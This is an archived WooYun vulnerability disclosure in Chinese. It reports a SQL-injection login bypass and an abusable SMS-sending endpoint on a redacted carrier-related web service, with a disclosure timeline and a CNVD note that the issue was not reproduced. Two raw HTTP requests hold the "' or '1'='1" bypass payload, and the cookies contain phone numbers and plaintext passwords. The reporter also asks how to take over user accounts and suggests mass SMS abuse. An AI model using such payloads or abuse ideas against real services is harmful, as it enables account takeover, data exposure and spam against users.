乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-04: 细节已通知厂商并且等待厂商处理中 2016-05-06: 厂商已经确认,细节仅向厂商公开 2016-05-16: 细节向核心白帽子及相关领域专家公开 2016-05-26: 细节向普通白帽子公开 2016-06-05: 细节向实习白帽子公开 2016-06-20: 细节向公众公开
RT
问题出在这个地址:**.**.**.**:9988/第一处是登录接口:
POST /userLogin.do?method=login HTTP/1.1Host: **.**.**.**:9988Proxy-Connection: keep-aliveContent-Length: 83Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: **.**.**.**:9988Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: **.**.**.**:9988/login.html?msg=%25E7%2594%25A8%25E6%2588%25B7%25E5%2590%258D%25E6%2588%2596%25E5%25AF%2586%25E7%25A0%2581%25E9%2594%2599%25E8%25AF%25AF%25EF%25BC%2581Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=B3C2A0D5A059FE7F19BCE2C0FD8E4370; email=13888888888; password=13888888888; isstorePwd=yesusername=13888888888' or '1'='1&password=13888888888' or '1'='1
绕过验证且存在sql注入问题。第二处是:发送短信接口
POST /sellMain.do?method=sendmsg HTTP/1.1Host: **.**.**.**:9988Proxy-Connection: keep-aliveContent-Length: 24Accept: text/plain, */*; q=0.01Origin: http://**.**.**.**:9988X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://**.**.**.**:9988/openOrder.html?id=8a5f82ca4f825e83014f82cd61440004&phone=Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: email=13339718222; password=111111; isstorePwd=no; JSESSIONID=2948C8DADD9D0F7FFD4B4FFC307A1800phone=13339718222
有没有大牛知道如何利用万能密码控制登录用户的。。我觉得应该可以做到。。求教!
然后可以利用短信接口给所有联通用户发流量包短信。。
过滤
危害等级:高
漏洞Rank:10
确认时间:2016-05-06 17:30
CNVD未复现所述情况,暂未列入处置流程。
暂无